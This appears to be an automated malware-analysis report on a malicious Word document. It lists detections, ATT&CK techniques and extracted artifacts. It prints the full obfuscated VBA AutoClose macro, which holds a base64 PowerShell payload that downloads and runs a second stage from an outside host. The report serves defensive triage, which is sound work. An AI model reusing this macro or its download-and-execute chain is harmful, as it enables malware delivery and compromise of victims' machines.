MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The AutoClose macro utilizes WScript.Shell and CreateObject to execute a PowerShell command. This command downloads a second-stage payload from the reconstructed URL 'http://poywebyzhgkansdqaqnooytre.com/SS/gesb.tzm' and executes it. The ClamAV detection 'Doc.Downloader.Powload-6707242-0' further confirms its downloader functionality.
Heuristics 8
-
ClamAV: Doc.Downloader.Powload-6707242-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6707242-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
If extraverted - unilobe > 1 Then CreateObject("WScript.Shell").Run impanel, 0 sana = False -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
If extraverted - unilobe > 1 Then CreateObject("WScript.Shell").Run impanel, 0 sana = False -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() reinfliction = Array("F", "T", "w", "p", "3", "u", "D", "f", "F", "K", "9", "f", "K", "E", "A", "w", "A", "I", "A", "D", "A", "Q", "A", "3", "A", "V", "A", "D", "A", "n", "A", "n", "A", "z", "A", "D", "A", "j", "A", "D", "A", "K", "x", "7", "w", "e", "j", "q", "5", "K", "x", "e", "j", "D", "f", "K", "C", "R", "u", "H", "6", "6", "K", "x", "e", "T", "K") -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2970 bytes |
SHA-256: 150ad1b6392ba736451cf277a0bd87ca662db06149ee7d041aad77d518dd4434 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function channellers(reinfliction)
quercic = Array("R", "q", "H", "D", "w", "3", "5", "I", "F", "7", "f", "C", "V", "x", "j", "T", "E", "9", "K", "z", "p", "u", "Q", "n", "A", "6", "e")
soil = Array("y", "i", "a", "e", "o", "S", "t", "w", "%", "N", "c", "B", "h", "-", "x", "C", "P", "/", " ", ".", "m", "p", "r", "l", "^", "s", "E")
veto = vbNullString
For Each alur In reinfliction
uninfallible = sorbable(alur, quercic, UBound(quercic))
If uninfallible > -1 Then
veto = soil(uninfallible) & veto
End If
Next
channellers = StrReverse(veto)
End Function
Public Function sorbable(swag, inwrapped, noncrinoid)
wagon = 0
tiltlike = -1
For wagon = 0 To noncrinoid
If inwrapped(wagon) = swag Then
tiltlike = wagon
End If
Next
sorbable = tiltlike
End Function
Sub AutoClose()
reinfliction = Array("F", "T", "w", "p", "3", "u", "D", "f", "F", "K", "9", "f", "K", "E", "A", "w", "A", "I", "A", "D", "A", "Q", "A", "3", "A", "V", "A", "D", "A", "n", "A", "n", "A", "z", "A", "D", "A", "j", "A", "D", "A", "K", "x", "7", "w", "e", "j", "q", "5", "K", "x", "e", "j", "D", "f", "K", "C", "R", "u", "H", "6", "6", "K", "x", "e", "T", "K")
Revision = "IAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAHAAbwB5AHcAZQBiAHoAaABnAGsAYQBuAHMAZABxAGEAbgBvAG8AeQB0AHIAZQAuAGMAbwBtAC8AUwBTAC8AZwBlAHMAYgAuAHQAegBtACcALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAAtADEANQA2ADAAMQA5ADEANwA4ADgALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAnAFwALQAxADUANgAwADEAOQAxADcAOAA4AC4AZQB4AGUAJwA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcABvAHkAdwBlAGIAegBoAGcAawBhAG4AcwBkAHEAYQBuAG8AbwB5AHQAcgBlAC4AYwBvAG0ALwBzAC4AcABoAHAAPwBpAGQAPQBnAGUAcwBiACcAKQA7AEkARQBYACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZwBpAGQAcgBvAGwAbwBnAGkAawBhAC4AcgB1AC8AUwB0AGEAdAAuAGMAbwB1AG4AdAAnACkAKQA7AA=="
bored = channellers(reinfliction)
Application.Run "tetrapteran", bored + Revision
End Sub
Private Sub tetrapteran(impanel)
unilobe = DateDiff("s", #1/1/1970#, Now())
sana = True
While sana
extraverted = DateDiff("s", #1/1/1970#, Now())
If extraverted - unilobe > 1 Then
CreateObject("WScript.Shell").Run impanel, 0
sana = False
End If
Wend
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 13312 bytes |
SHA-256: 772c2a399e28341eafad3fcfeed32831e76f32b81196ee6463ce672a2b88a784 |
|||
|
Detection
ClamAV:
Doc.Downloader.Powload-6707242-0
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.